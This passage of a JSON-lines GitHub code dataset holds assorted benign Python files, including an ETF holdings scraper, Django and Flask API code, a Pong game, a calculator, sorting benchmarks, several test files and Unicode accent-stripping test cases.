first\netf_symbols.remove(\"SPY\")\netf_symbols.remove(\"QQQ\")\netf_symbols.insert(0, \"QQQ\")\netf_symbols.insert(0, \"SPY\")\n\nfor etf in etf_symbols:\n try:\n file = f\"data/{etf}.csv\"\n link = f\"https://stockanalysis.com/etf/{etf}/holdings/\"\n r = requests.get(link, headers={\"User-Agent\":\"Mozilla/5.0\"})\n soup = bs(r.text, \"html.parser\")\n soup = soup.find(\"table\")\n tds = soup.findAll(\"td\")\n tickers = []\n for i in tds[1::5]:\n tickers.append(i.text)\n percents = []\n for i in tds[3::5]:\n percents.append(float(i.text.strip(\"%\")))\n df = pd.DataFrame(data=[percents])\n df.columns = tickers\n df.index = [datetime.datetime.now().strftime(\"%m/%d/%Y\")]\n df[\"SUM\"] = df.sum(axis=1)\n if df.columns.value_counts().max() > 1:\n # Seems to occur for me with symbol 1117.hk having many desciptions as an example\n print(\"Too many entries\")\n print(etf)\n continue\n\n try:\n df_historical = pd.read_csv(file, index_col=0)\n new_df = pd.concat([df_historical, df], axis=0).fillna(0)\n except FileNotFoundError:\n new_df = df.copy()\n # Make SUM the last column\n ordered_cols = list(new_df.columns)\n ordered_cols.remove(\"SUM\")\n ordered_cols += [\"SUM\"]\n new_df = new_df[ordered_cols]\n new_df.to_csv(file)\n if etf == \"SPY\":\n print(\"SPY Saved\")\n except Exception as e:\n print(\"error\")\n print(etf)\n pass\n","repo_name":"jmaslek/etf_scraper","sub_path":"scrape_holdings.py","file_name":"scrape_holdings.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"34902207400","text":"from django.contrib.auth.models import User\nfrom django.db import transaction\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom apps.core.models import AddressFrom, AddressTo, Order, Stuff\n\n\nclass AddressFromSerializer(ModelSerializer):\n class Meta:\n model = AddressFrom\n fields = \"__all__\"\n\n\nclass AddressToSerializer(ModelSerializer):\n class Meta:\n model = AddressTo\n fields = \"__all__\"\n\n\nclass StuffSerializer(ModelSerializer):\n class Meta:\n model = Stuff\n fields = \"__all__\"\n\n\nclass OrdersListSerializer(ModelSerializer):\n address_from = serializers.ReadOnlyField(source=\"address_from.city\")\n address_to = serializers.ReadOnlyField(source=\"address_to.city\")\n\n class Meta:\n model = Order\n fields = \"__all__\"\n\n\nclass OrderSerializer(ModelSerializer):\n address_from = AddressFromSerializer()\n address_to = AddressToSerializer()\n stuff = StuffSerializer()\n\n class Meta:\n model = Order\n fields = \"__all__\"\n\n @transaction.atomic\n def create(self, validated_data):\n user = User.objects.get(id=validated_data.pop(\"user\").id)\n address_from = AddressFrom.objects.create(\n **validated_data.pop(\"address_from\")\n )\n address_to = AddressTo.objects.create(\n **validated_data.pop(\"address_to\")\n )\n stuff = Stuff.objects.create(**validated_data.pop(\"stuff\"))\n instance = Order.objects.create(\n address_from=address_from,\n user=user,\n address_to=address_to,\n stuff=stuff,\n **validated_data\n )\n return instance\n","repo_name":"beproxy/drf_utest_pylint","sub_path":"backend/apps/core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33409738728","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n\nfrom turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.setup(width=800, height=600)\nscreen.bgcolor(\"black\")\nscreen.title(\"My Pong Game\")\nscreen.tracer(0)\n\nr_paddle = Paddle((350, 0))\nl_paddle = Paddle((-350, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\n\nscreen.listen()\nscreen.onkey(r_paddle.up, \"Up\")\nscreen.onkey(r_paddle.down, \"Down\")\nscreen.onkey(l_paddle.up, \"w\")\nscreen.onkey(l_paddle.down, \"s\")\n\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(ball.move_speed)\n screen.update()\n ball.move()\n\n # detect collision with wall\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n\n # detect collision with right paddle\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n # print(\"Made contact.\")\n ball.bounce_x()\n\n # detect when right paddle misses\n if ball.xcor() > 390:\n ball.reset_position()\n scoreboard.l_point()\n\n # detect when left paddle misses\n if ball.xcor() < -390:\n ball.reset_position()\n scoreboard.r_point()\n\nscreen.exitonclick()","repo_name":"jsoto3000/angela-yu-100-days-python","sub_path":"day-022-pong/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71371956252","text":"from sys import stdin,stdout\n\nt = int(stdin.readline().strip())\n\nfor _ in range(t):\n n,m = map(int,stdin.readline().split())\n M = []\n for _ in range(n):\n M.append(list(map(int,stdin.readline().split())))\n\n counts = {}\n for i in range(n):\n for j in range(m):\n k = i+j\n counts[k] = counts.get(k,0)+M[i][j]\n\n ans = 0\n s,e,c,d = 0,m+n-2,2,2*min(m,n)\n while s < e:\n a = counts[s]+counts[e]\n ans += min(a,c-a)\n s,e,c = s+1,e-1,min(d,c+2)\n\n stdout.write('{}\\n'.format(ans))\n","repo_name":"xiema/competitive","sub_path":"codeforces/1366C_palinpaths.py","file_name":"1366C_palinpaths.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16105531035","text":"\"\"\"\nModule that defines the REST API for the Department model.\n\"\"\"\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom sqlalchemy import exc as sqlalchemy_err\n\nfrom department_app.service import DepartmentService\nfrom .utils import format_exception_message, log_unhandled_exception\n\n\nclass DepartmentListAPI(Resource):\n \"\"\"\n Defines the REST API for getting the full list of departments and creating a new one.\n \"\"\"\n\n @staticmethod\n def get():\n \"\"\"\n Get request handler.\n @return: list of departments dictionaries\n \"\"\"\n\n deps = DepartmentService.get_all_departments()\n return [dep.to_dict() for dep in deps]\n\n @staticmethod\n def post():\n \"\"\"\n Put request handler.\n @return: new department as dictionary, if one was successfully created\n \"\"\"\n\n try:\n name = request.form.get(\"name\")\n description = request.form.get(\"description\")\n new_dep = DepartmentService.create_department(name=name, description=description)\n except (ValueError, TypeError) as exc:\n return format_exception_message(exception=exc), 400\n except sqlalchemy_err.IntegrityError as exc:\n return format_exception_message(exc.orig), 400\n except Exception as exc:\n log_unhandled_exception(exc)\n return format_exception_message(), 500\n\n return new_dep.to_dict(), 202\n\n\nclass DepartmentAPI(Resource):\n \"\"\"\n Defines the REST API for a single department query.\n \"\"\"\n\n @staticmethod\n def get(dep_id):\n \"\"\"\n Get request handler.\n @param dep_id: id of the department to get\n @return: department as a dictionary or 404 error if department does not exist\n \"\"\"\n\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n res = dep.to_dict()\n res[\"average_salary\"] = DepartmentService.get_department_average_salary(dep)\n res[\"employee_count\"] = DepartmentService.get_department_employee_count(dep)\n\n employee_sample = DepartmentService.get_department_employee_sample(dep, 3)\n res[\"employee_sample\"] = []\n for employee in employee_sample:\n res[\"employee_sample\"].append(employee.to_dict())\n\n return res\n\n @staticmethod\n def patch(dep_id):\n \"\"\"\n Patch request handler, for editing a department.\n If a parameter is None, it is not changed in the department.\n @param dep_id: id of the department to update\n @return: edited department as a dictionary or 404 error if department does not exist\n \"\"\"\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n name = request.form.get(\"name\", default=None)\n description = request.form.get(\"description\", default=None)\n\n try:\n updated_dep = DepartmentService.update_department(\n department=dep, name=name, description=description\n )\n\n except (ValueError, TypeError) as exc:\n return format_exception_message(exception=exc), 400\n except sqlalchemy_err.IntegrityError as exc:\n return format_exception_message(exc.orig), 400\n except Exception as exc:\n log_unhandled_exception(exc)\n return format_exception_message(), 500\n\n return updated_dep.to_dict(), 202\n\n @staticmethod\n def put(dep_id):\n \"\"\"\n Put request handler, for editing a department.\n If a parameter is None, it is set as None in the department.\n @param dep_id: id of the department to update\n @return: edited department as a dictionary or 404 error if department does not exist\n \"\"\"\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n name = request.form.get(\"name\", default=\"\")\n description = request.form.get(\"description\", default=\"\")\n\n try:\n updated_dep = DepartmentService.update_department(\n department=dep, name=name, description=description\n )\n\n except (ValueError, TypeError) as exc:\n return format_exception_message(exception=exc), 400\n except sqlalchemy_err.IntegrityError as exc:\n return format_exception_message(exc.orig), 400\n except Exception as exc:\n log_unhandled_exception(exc)\n return format_exception_message(), 500\n\n return updated_dep.to_dict(), 202\n\n @staticmethod\n def delete(dep_id):\n \"\"\"\n Delete request handler.\n @param dep_id: id of the department to delete\n \"\"\"\n dep = DepartmentService.get_department_by_id(dep_id=dep_id)\n DepartmentService.delete_department(department=dep)\n","repo_name":"leirimnad/EPAMPython","sub_path":"department_app/rest/department_api.py","file_name":"department_api.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5879396588","text":"import transform\nimport pytest\nfrom etl_exceptions import NotCorrectDateType\nfrom to_utc_functions.to_utc_function_int import to_utc_function_int\nfrom to_utc_functions.to_utc_function_str_date import to_utc_function_str_date\n\n\ndef test_empty_tz_columns():\n test_transformer = transform.APITransformer()\n assert test_transformer.tz_columns == []\n\n\ndef test_load_functions_from_to_utc_functions():\n data = [[1,11],[2,22],[3,33],]\n header=[1,2]\n test_transformer = transform.APITransformer(header=header, data=data)\n result = [function.__name__ for function in test_transformer.functions_list]\n assert 'to_utc_function_int' in result\n assert 'to_utc_function_str_date' in result\n\n\ndef test_convert_int_ts_ok():\n data = [[1,11],[2,22],[3,33],]\n header=[1,2]\n tz_columns = [0]\n test_transformer = transform.APITransformer(header=header, data=data, tz_columns=tz_columns)\n expected = to_utc_function_int(1)\n assert test_transformer.data[0][0] == expected\n\n\ndef test_convert_str_ts_ok():\n data = [[1,'2023-09-28 23:15:00+00:00'],[2,'2023-09-28 23:20:00+00:00'],[3,'2023-09-28 23:25:00+00:00'],]\n header=[1,2]\n tz_columns = [1]\n test_transformer = transform.APITransformer(header=header, data=data, tz_columns=tz_columns)\n expected = to_utc_function_str_date('2023-09-28 23:15:00+00:00')\n assert test_transformer.data[0][1] == expected\n\n\ndef test_convert_nonsense_ts_raises_exception():\n data = [[1,None],[2,None],[3,None],]\n header=[1,2]\n tz_columns = [1]\n with pytest.raises(NotCorrectDateType):\n transform.APITransformer(header=header, data=data, tz_columns=tz_columns)\n","repo_name":"josemrsantos/trailstone","sub_path":"etl/tests/test_transform.py","file_name":"test_transform.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72593121691","text":"import re\nfrom itertools import chain\nfrom pythonds.basic.stack import Stack\nfrom collections import deque\n\n\ndef check_the_sign(numbers_arr):\n for i in range(1, len(numbers_arr), 2):\n if len(numbers_arr[i]) > 1:\n if numbers_arr[i][0] == '-':\n if len(numbers_arr[i]) % 2 != 0:\n numbers_arr[i] = '-'\n else:\n numbers_arr[i] = '+'\n else:\n numbers_arr[i] = '+'\n\n return numbers_arr\n\n\ndef convert_positive_num(user_input):\n input_arr = user_input.split(' ')\n for i, el in enumerate(input_arr):\n if el[0] == '+':\n input_arr[i] = el[1:]\n\n return user_input\n\n\ndef check_if_input_correct(user_input):\n if user_input[0] == '/' and (user_input != '/help' and user_input != '/exit'):\n print('Unknown command')\n return False\n\n input_arr = convery_to_array_2(user_input)\n\n op = ['^', '+', '-', '*', '/']\n count_p_l = 0\n count_p_r = 0\n for i, el in enumerate(input_arr):\n if i < len(input_arr)-1:\n if el in op and input_arr[i+1] in op and ((el != '+' and input_arr[i+1] != '+') or(el != '-' and input_arr[i+1] != '-')):\n print('Invalid expression')\n return False\n elif el == '(' and input_arr[i+1] == ')':\n print('Invalid expression')\n return False\n elif el == ')' and input_arr[i+1] == '(':\n print('Invalid expression')\n return False\n elif input_arr[len(input_arr) -1] in op:\n print('Invalid expression')\n return False\n\n if el == '(':\n count_p_l += 1\n elif el == ')':\n count_p_r += 1\n\n if count_p_l != count_p_r:\n print('Invalid expression')\n return False\n\n\n pattern_num = '[0-9]+'\n pattern_letter = '[A-Za-z]+'\n output = True\n\n if '=' in user_input:\n return True\n\n for count, el in enumerate(input_arr):\n\n if re.match(pattern_num, el):\n if el[len(el) - 1] == '+' or el[len(el) - 1] == '-':\n output = False\n return output\n elif re.match(pattern_num, el):\n if count < len(input_arr) - 1 and re.match(pattern_num, input_arr[count + 1]):\n output = False\n return output\n\n return output\n\n\ndef change_input_to_arr(user_input):\n input_arr = re.split('\\s+', user_input)\n\n for i, el in enumerate(input_arr):\n if len(el) > 1:\n input_arr[i] = list(el)\n\n return list(chain.from_iterable(input_arr))\n\n\ndef check_input_correctness(input_arr, variables):\n\n equal_sign = 0\n if '=' in input_arr:\n for el in input_arr:\n if el == '=':\n equal_sign += 1\n if equal_sign > 1:\n print('Invalid assignment')\n return False\n\n if equal_sign == 1:\n equal_s_index = input_arr.index('=')\n first_part = ''.join(input_arr[:equal_s_index])\n last_part = ''.join(input_arr[equal_s_index + 1:])\n variable = ''.join(first_part)\n\n if re.match('^[a-zA-Z]+$', variable):\n if re.match('^[0-9]+$', ''.join(last_part)):\n value = int(''.join(last_part))\n variables[variable] = value\n elif re.match('^[a-zA-Z]+$', ''.join(last_part)):\n key = ''.join(last_part)\n if key in variables:\n variables[variable] = variables[key]\n else:\n print('Unknown variable')\n return False\n elif re.match('^[a-zA-Z0-9]+$', ''.join(last_part)):\n print('Invalid assignment')\n return False\n elif re.match('^[a-zA-Z0-9]+$', ''.join(first_part)):\n print('Invalid identifier')\n return False\n\n\ndef display_var_value(user_input, variables):\n if user_input in variables:\n print(variables[user_input])\n else:\n print('Unknown variable')\n\n\ndef counvert_variable_to_number(input_arr, variables):\n for i, el in enumerate(input_arr):\n if el in variables:\n input_arr[i] = int(variables[el])\n elif not el.isdigit() and el not in ['^', '+', '-', '*', '/', '(', ')']:\n print('Unknown variable')\n break\n return input_arr\n\n\ndef convery_to_array_2(str):\n op = ['^', '+', '-', '*', '/', '(', ')']\n index = 0\n res = []\n for i in range(len(str)):\n if str[i] in op:\n res.append(str[index: i])\n res.append(str[i])\n index = i + 1\n res.append(str[index:len(str)])\n\n res = [x.strip() for x in res if x.strip() != '']\n\n return res\n\n\ndef infixToPostfix(infixexpr_arr):\n prec = {}\n prec[\"*\"] = 3\n prec[\"/\"] = 3\n prec[\"+\"] = 2\n prec[\"-\"] = 2\n prec[\"(\"] = 1\n opStack = Stack()\n postfixList = []\n tokenList = infixexpr_arr\n\n for token in tokenList:\n token = token.strip() # '33 ' -> '33'\n if re.match('^[a-zA-Z]+$', token) or re.match('^[0-9]+$', token):\n postfixList.append(token)\n elif re.match('^[a-zA-Z0-9]+$', token): # 'a22'\n print('Invalid identifier')\n break\n elif token == '(':\n opStack.push(token)\n elif token == ')':\n topToken = opStack.pop()\n while topToken != '(':\n postfixList.append(topToken)\n topToken = opStack.pop()\n else:\n while (not opStack.isEmpty()) and (prec[opStack.peek()] >= prec[token]):\n postfixList.append(opStack.pop())\n opStack.push(token)\n\n while not opStack.isEmpty():\n postfixList.append(opStack.pop())\n return postfixList\n\n\ndef calculate_result(postfix):\n op = ['^', '+', '-', '*', '/']\n equation = deque()\n\n for el in postfix:\n equation.append(el)\n\n for i, el in enumerate(equation):\n if el not in op:\n equation[i] = int(el)\n\n que_helper = deque()\n result = 0\n\n if len(equation) == 1:\n result = equation.pop()\n else:\n while len(equation) > 0:\n x = equation.popleft()\n if x not in op:\n que_helper.appendleft(x)\n else:\n b = que_helper.popleft()\n a = que_helper.popleft()\n if x == '^':\n result = a ** b\n elif x == '*':\n result = a * b\n elif x == '/':\n result = a / b\n elif x == '+':\n result = a + b\n elif x == '-':\n result = a - b\n que_helper.appendleft(result)\n\n print(int(result))\n return result\n\n\n###########################################\nvariables = {}\nwhile True:\n\n user_input = input().strip()\n\n if user_input != '':\n if user_input[0] == '+':\n user_input = convert_positive_num(user_input)\n\n if check_if_input_correct(user_input):\n if user_input == '/exit':\n print('Bye!')\n break\n\n elif user_input == '/help':\n print('You can use +. -, /, *, ^ and define variables in this calculator')\n\n elif len(user_input) > 0:\n if '=' in user_input:\n input_arr = change_input_to_arr(user_input)\n check_input_correctness(input_arr, variables)\n\n elif re.match('^[a-zA-Z]+$', user_input):\n display_var_value(user_input, variables)\n\n elif '=' not in user_input:\n numbers_from_user = convery_to_array_2(user_input)\n equation = check_the_sign(numbers_from_user)\n numbers_equation = counvert_variable_to_number(equation, variables)\n numbers_equation = [str(x) for x in numbers_equation]\n postfix = infixToPostfix(numbers_equation)\n calculate_result(postfix)\n\n else:\n print('Invalid expression')\n\n\n","repo_name":"KatarzynaKnapik/advanced_calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":8129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72250283930","text":"import random # Imports the random module for generating random numbers\nimport time # Imports the time module for measuring the execution time\nimport matplotlib.pyplot as plt # Imports the matplotlib.pyplot module for creating plots\nimport pandas as pd # Imports the pandas module for data manipulation and analysis\n\ndef bubblesort(arr):\n n = len(arr) # Gets the length of the array\n for i in range(n): # Iterates over each element in the array\n for j in range(0, n-i-1): # Iterates from the first element to the (n-i-1)-th element\n if arr[j] > arr[j+1]: # Checks if the current element is greater than the next element\n # Swaps the elements if they are in the wrong order\n arr[j], arr[j+1] = arr[j+1], arr[j]\n\ndef selectionsort(arr):\n n = len(arr) # Gets the length of the array\n for i in range(n): # Iterates over each element in the array\n min_idx = i # Assumes the current index has the minimum element\n \n # Finds the index of the minimum element in the unsorted portion of the array\n for j in range(i+1, n):\n if arr[j] < arr[min_idx]: # Compares the current element with the assumed minimum element\n min_idx = j # Updates the index of the minimum element\n \n # Swaps the current element with the minimum element\n arr[i], arr[min_idx] = arr[min_idx], arr[i]\n \n\ndef insertionsort(arr):\n for i in range(1, len(arr)): # Iterates over each element in the array starting from the second element\n key = arr[i] # Stores the current element as the key\n j = i - 1 # Sets the initial index of the previous element\n\n # Moves elements of arr[0...i-1], that are greater than key, to one position ahead of their current position\n while j >= 0 and arr[j] > key:\n arr[j + 1] = arr[j] # Shifts elements to the right\n j -= 1 # Decrements the index\n\n arr[j + 1] = key # Places the key at its correct position in the sorted subarray\n\ndef countingsort(array, max_val):\n m = max_val + 1 # Determines the size of the counting array\n\n count = [0] * m # Creates a counting array initialized with zeros\n\n for a in array:\n # Counts occurrences of each element in array\n count[a] += 1 # Increments the count for the current element\n\n i = 0 # Initialises the index for the sorted array\n\n for a in range(m): # Iterates over the counting array\n for c in range(count[a]): # Repeats for the count of each element in the counting array\n array[i] = a # Assigns the element to the sorted array\n i += 1 # Increments the index of the sorted array\n\n \ndef mergesort(array):\n print(\"Splitting \", array) # Prints a message indicating the current split operation\n\n if len(array) > 1: # Checks if there is more than one element in the list\n mid = len(array) // 2 # Calculates the middle index\n lefthalf = array[:mid] # Divides the list into left half\n righthalf = array[mid:] # Divides the list into right half\n\n mergesort(lefthalf) # Recursively calls mergeSort on the left half\n mergesort(righthalf) # Recursively calls mergeSort on the right half\n\n i = 0 # Index for the left half\n j = 0 # Index for the right half\n k = 0 # Index for the original list\n\n while i < len(lefthalf) and j < len(righthalf):\n # Compares the elements from the left and right halves\n if lefthalf[i] <= righthalf[j]:\n array[k] = lefthalf[i] # Places the smaller element into the original list\n i += 1\n else:\n array[k] = righthalf[j] # Places the smaller element into the original list\n j += 1\n k += 1\n\n while i < len(lefthalf):\n # Copies any remaining elements from the left half to the original list\n array[k] = lefthalf[i]\n i += 1\n k += 1\n\n while j < len(righthalf):\n # Copies any remaining elements from the right half to the original list\n array[k] = righthalf[j]\n j += 1\n k += 1\n\n\ndef generate_random_array(n):\n return [random.randint(0, 1000) for _ in range(n)] # Generates a list of random integers between 0 and 1000\n\n\n# Sorting algorithms\n\ndef benchmark_sorting_algorithms():\n algorithms = {\n \"Bubble Sort\": bubblesort,\n \"Selection Sort\": selectionsort,\n \"Insertion Sort\": insertionsort,\n \"Counting Sort\": countingsort,\n \"Merge Sort\": mergesort\n }\n\n input_sizes = [100, 250, 500, 750, 1000, 1250, 2500, 3750, 5000, 6250, 7500, 8750, 10000] # List of input sizes\n results = {algorithm: [] for algorithm in algorithms} # Creates an empty dictionary to store the results\n output_results = [] # To store the results in the desired format\n\n for size in input_sizes:\n for algorithm in algorithms:\n arr = generate_random_array(size) # Generates a random array of the given size\n start_time = time.time() # Records the start time\n if algorithm == \"Counting Sort\":\n max_val = max(arr) # Finds the maximum value in the array\n algorithms[algorithm](arr, max_val) # Calls the counting sort algorithm with the maximum value\n else:\n algorithms[algorithm](arr) # Calls the sorting algorithm\n end_time = time.time() # Records the end time\n total_time = (end_time - start_time) * 1000 # Calculates the total execution time in milliseconds\n avg_time = total_time / 10.0 # Calculates the average execution time over 10 iterations\n results[algorithm].append(avg_time) # Adds the average time to the results dictionary\n\n # Stores the results in the desired format\n for algorithm in algorithms:\n output_results.append([f\"{algorithm}\"] + [f\"{time:.3f}\" for time in results[algorithm]])\n\n # Prints the results\n columns = [\"Algorithm\"] + [str(size) for size in input_sizes]\n df = pd.DataFrame(output_results, columns=columns)\n print(df.to_string(index=False)) # Print the DataFrame without the index\n\n # Plots the results\n fig, ax = plt.subplots()\n ax.set_title(\"Sorting Algorithms Benchmarking\")\n ax.set_xlabel(\"Input Size (n)\")\n ax.set_ylabel(\"Running Time (milliseconds)\")\n\n for algorithm in algorithms:\n ax.plot(input_sizes, results[algorithm], label=algorithm) # Plot the running time for each algorithm\n\n ax.legend() # Shows the legend\n plt.savefig('sorting_algorithms.png') # Saves the plot to a file\n plt.show() # Displays the plot\n\n\nbenchmark_sorting_algorithms() # Runs the benchmarking function\n","repo_name":"Tanjasta/My-work","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5119229484","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_cookiecutter_invocation\n----------------------------\n\nTests to make sure that cookiecutter can be called from the cli without\nusing the entry point set up for the package.\n\"\"\"\n\nimport os\nimport pytest\nimport subprocess\nimport sys\n\nfrom cookiecutter import utils\n\n\ndef test_should_raise_error_without_template_arg(capfd):\n with pytest.raises(subprocess.CalledProcessError):\n subprocess.check_call(['python', '-m', 'cookiecutter.cli'])\n\n _, err = capfd.readouterr()\n exp_message = 'Error: Missing argument \"template\".'\n assert exp_message in err\n\n\n@pytest.fixture\ndef project_dir(request):\n \"\"\"Remove the rendered project directory created by the test.\"\"\"\n rendered_dir = 'fake-project-templated'\n\n def remove_generated_project():\n if os.path.isdir(rendered_dir):\n utils.rmtree(rendered_dir)\n request.addfinalizer(remove_generated_project)\n\n return rendered_dir\n\n\n@pytest.mark.usefixtures('clean_system')\ndef test_should_invoke_main(monkeypatch, project_dir):\n monkeypatch.setenv('PYTHONPATH', '.')\n\n subprocess.check_call([\n sys.executable,\n '-m',\n 'cookiecutter.cli',\n 'tests/fake-repo-tmpl',\n '--no-input'\n ])\n\n assert os.path.isdir(project_dir)\n","repo_name":"rmedaer/deb-cookiecutter","sub_path":"tests/test_cookiecutter_invocation.py","file_name":"test_cookiecutter_invocation.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"917535485","text":"# Python ver: 3.8.3\n#\n# Author: Angel Padilla\n#\n# Purpose: Practice building a app that tracks student infomation\n#\n# Tested OS:` This code was tested for use with Windows 10.\nfrom tkinter import *\nimport tkinter as tk\n\n# importing other modules\nimport Stu_Track_GUI\nimport Stu_Track_func\n\n\nclass ParentWindow(Frame):\n def __init__(self, master):\n Frame.__init__(self, master)\n\n # Define master frame\n self.master = master\n self.master.resizable(width=False, height=False)\n self.master.geometry('700x500')\n self.master.title(\"Student Tracking\")\n self.master.configure(bg=\"forestgreen\")\n\n #loads GUI\n Stu_Track_GUI.load_gui(self)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n App = ParentWindow(root)\n root.mainloop()","repo_name":"ajustinpadilla/python_projects","sub_path":"Student_Tracking/Stu_Track_main.py","file_name":"Stu_Track_main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70472685853","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nTESTS is a dict with all you tests.\nKeys for this will be categories' names.\nEach test is dict with\n \"input\" -- input data for user function\n \"answer\" -- your right answer\n \"explanation\" -- not necessary key, it's using for additional info in animation.\n\"\"\"\n\n\nTESTS = {\n \"Basics\": [\n {\n \"input\": u\"préfèrent\",\n \"answer\": u\"preferent\",\n },\n {\n \"input\": u\"loài trăn lớn\",\n \"answer\": u\"loai tran lon\",\n },\n {\n \"input\": u\"König\",\n \"answer\": u\"Konig\",\n },\n {\n \"input\": u\"完好無缺\",\n \"answer\": u\"完好無缺\",\n },\n {\n \"input\": u\"àèìǹòùẁỳÀÈÌǸÒÙẀỲ\",\n \"answer\": u\"aeinouwyAEINOUWY\",\n },\n {\n \"input\": u\"ằẰ\",\n \"answer\": u\"aA\",\n },\n {\n \"input\": u\"ầẦềỀồỒ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ờỜừỪ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"ȁȅȉȍȑȕȀȄȈȌȐȔ\",\n \"answer\": u\"aeioruAEIORU\",\n },\n {\n \"input\": u\"áćéǵíḱĺḿńóṕŕśúẃýźÁĆÉǴÍḰĹḾŃÓṔŔŚÚẂÝŹ\",\n \"answer\": u\"acegiklmnoprsuwyzACEGIKLMNOPRSUWYZ\",\n },\n {\n \"input\": u\"ắẮ\",\n \"answer\": u\"aA\",\n },\n {\n \"input\": u\"ấẤếẾốỐ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ớỚứỨ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"őűŐŰ\",\n \"answer\": u\"ouOU\",\n },\n {\n \"input\": u\"âĉêĝĥîĵôŝûŵŷẑÂĈÊĜĤÎĴÔŜÛŴŶẐ\",\n \"answer\": u\"aceghijosuwyzACEGHIJOSUWYZ\",\n },\n {\n \"input\": u\"ǎǍčČďĎěĚǧǦȟȞǐǏǰǩǨľĽňŇǒǑřŘšŠťŤǔǓžŽ\",\n \"answer\": u\"aAcCdDeEgGhHiIjkKlLnNoOrRsStTuUzZ\",\n },\n {\n \"input\": u\"ăĂĕĔğĞḫḪĭĬŏŎŭŬ\",\n \"answer\": u\"aAeEgGhHiIoOuU\",\n },\n {\n \"input\": u\"ȃȂȇȆȋȊȏȎȗȖȓȒ\",\n \"answer\": u\"aAeEiIoOuUrR\",\n },\n {\n \"input\": u\"ãÃẽẼĩĨñÑõÕũŨṽṼỹỸ\",\n \"answer\": u\"aAeEiInNoOuUvVyY\",\n },\n {\n \"input\": u\"ẵẴ\",\n \"answer\": u\"aA\",\n },\n ],\n \"Extra\": [\n {\n \"input\": u\"ẫẪễỄỗỖ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ỡỠữỮ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"ĀāĒēḠḡĪīŌōŪūȲȳ\",\n \"answer\": u\"AaEeGgIiOoUuYy\",\n },\n {\n \"input\": u\"ḆḇḎḏẖḴḵḺḻṈṉṞṟṮṯẔẕ\",\n \"answer\": u\"BbDdhKkLlNnRrTtZz\",\n },\n {\n \"input\": u\"äëḧïöẗüẅẍÿÄËḦÏÖÜẄẌŸ\",\n \"answer\": u\"aehiotuwxyAEHIOUWXY\",\n },\n {\n \"input\": u\"åÅůŮẘẙ\",\n \"answer\": u\"aAuUwy\",\n },\n {\n \"input\": u\"ȧȦḃḂċĊḋḊėĖḟḞġĠḣḢİṁṀṅṄȯȮṗṖṙṘṡṠṫṪẇẆẋẊẏẎżŻ\",\n \"answer\": u\"aAbBcCdDeEfFgGhHImMnNoOpPrRsStTwWxXyYzZ\",\n },\n {\n \"input\": u\"ẠạḄḅḌḍẸẹḤḥỊịḲḳḶḷṂṃṆṇỌọṚṛṢṣṬṭỤụṾṿẈẉỴỵẒẓ\",\n \"answer\": u\"AaBbDdEeHhIiKkLlMmNnOoRrSsTtUuVvWwYyZz\",\n },\n {\n \"input\": u\"ąĄçÇḑḐęĘģĢḩḨįĮķĶļĻņŅǫǪŗŖşŞţŢųŲ\",\n \"answer\": u\"aAcCdDeEgGhHiIkKlLnNoOrRsStTuU\",\n },\n {\n \"input\": u\"ảẢẻẺỉỈỏỎủỦỷỶ\",\n \"answer\": u\"aAeEiIoOuUyY\",\n },\n {\n \"input\": u\"ẳẲ\",\n \"answer\": u\"aA\",\n },\n {\n \"input\": u\"ẩẨểỂổỔ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ởỞửỬ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"ặẶ\",\n \"answer\": u\"aA\",\n 